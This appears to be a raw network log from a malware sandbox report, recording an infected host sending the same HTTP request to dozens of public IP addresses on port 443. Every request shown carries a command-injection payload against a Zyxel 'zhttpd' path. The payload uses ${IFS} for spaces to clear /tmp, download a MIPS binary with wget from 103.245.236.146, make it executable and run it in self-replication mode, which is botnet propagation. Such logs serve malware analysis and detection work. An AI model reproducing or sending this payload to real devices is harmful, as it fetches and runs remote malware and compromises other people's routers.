                                                        Jan 28, 2024 10:12:39.148125887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1055192.168.2.1451158100.14.124.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148192883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1056192.168.2.143632698.205.124.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148216009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1057192.168.2.145128640.186.182.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148246050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1058192.168.2.1454464122.149.65.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148281097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1059192.168.2.143797224.32.81.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148319960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1060192.168.2.145463623.1.223.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148365021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1061192.168.2.144633017.73.1.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148402929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1062192.168.2.1435690159.98.93.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148435116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1063192.168.2.143416250.99.229.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148483038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1064192.168.2.1442622187.221.96.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148505926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1065192.168.2.1458878181.14.44.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148561001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1066192.168.2.1445324174.70.210.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148603916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1067192.168.2.1436976217.159.131.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148644924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1068192.168.2.1438088118.75.255.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148674011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1069192.168.2.1440974109.149.228.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148709059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1070192.168.2.1440886197.148.105.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148766041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1071192.168.2.1433410191.241.37.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148822069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1072192.168.2.145349466.150.37.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148838997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1073192.168.2.1439882168.249.51.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148879051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1074192.168.2.1443994205.71.71.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148910999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1075192.168.2.144216898.35.217.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148937941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1076192.168.2.1458720204.174.91.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148988962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1077192.168.2.1450636112.170.198.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149041891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1078192.168.2.1458172105.152.147.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149061918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1079192.168.2.1460214172.75.105.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149121046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1080192.168.2.1435150141.126.244.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149153948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1081192.168.2.145805491.152.151.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149185896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1082192.168.2.145908014.40.215.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149220943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1083192.168.2.143423891.14.51.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149257898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1084192.168.2.1437878187.40.113.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149292946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1085192.168.2.145046653.247.166.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149319887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1086192.168.2.1445202135.253.38.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149352074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1087192.168.2.144629296.157.254.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149410963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1088192.168.2.1433700167.224.54.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149444103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1089192.168.2.1455212177.114.223.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149492025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1090192.168.2.1444078185.234.100.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149524927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1091192.168.2.144626649.54.194.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149553061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1092192.168.2.1459548181.137.232.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149590015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1093192.168.2.14523184.82.57.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149641991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1094192.168.2.143941041.57.199.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149668932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1095192.168.2.1441666218.39.237.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149703979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1096192.168.2.1441836222.187.192.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149732113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1097192.168.2.1459400148.215.159.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149780035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1098192.168.2.143393825.38.159.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149827003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1099192.168.2.143847499.59.113.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149838924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1100192.168.2.1452726205.197.3.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149909973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1101192.168.2.1460190166.22.212.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149940968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1102192.168.2.1442952114.91.134.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149982929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1103192.168.2.1433538164.238.180.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.149995089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1104192.168.2.1454832183.48.240.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150051117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1105192.168.2.1433604175.120.131.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150075912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1106192.168.2.1444318117.143.120.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150098085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1107192.168.2.144430875.140.5.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150142908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1108192.168.2.143411467.195.114.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150177002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1109192.168.2.1437668122.38.126.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150229931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1110192.168.2.143316838.244.47.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150259972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1111192.168.2.1450694193.64.84.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150296926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1112192.168.2.144604047.31.218.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150322914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1113192.168.2.145959617.12.133.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150358915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1114192.168.2.1436774213.146.138.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150410891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1115192.168.2.144511096.154.198.61443
                                                        TimestampBytes transferredDirectionData
